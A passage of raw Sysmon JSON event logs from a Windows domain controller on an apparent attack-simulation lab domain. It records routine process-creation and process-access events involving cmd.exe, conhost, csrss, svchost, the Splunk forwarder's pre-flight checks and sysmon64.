C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010B4BC0300}","TargetProcessId":"3724","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1858,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.735\r\nProcessGuid: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nProcessId: 3736\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-0010B4BC0300}\r\nParentProcessId: 3724\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.735","ProcessGuid":"{A837DB8D-01C7-5F25-0000-001075BD0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-0010B4BC0300}","ParentProcessId":"3724","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1859,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-0010B4BC0300}\r\nSourceProcessId: 3724\r\nSourceThreadId: 3744\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nTargetProcessId: 3736\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-0010B4BC0300}","SourceProcessId":"3724","SourceThreadId":"3744","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","TargetProcessId":"3736","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1860,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nTargetProcessId: 3736\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","TargetProcessId":"3736","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1861,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1862,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1863,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1864,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1865,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1866,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 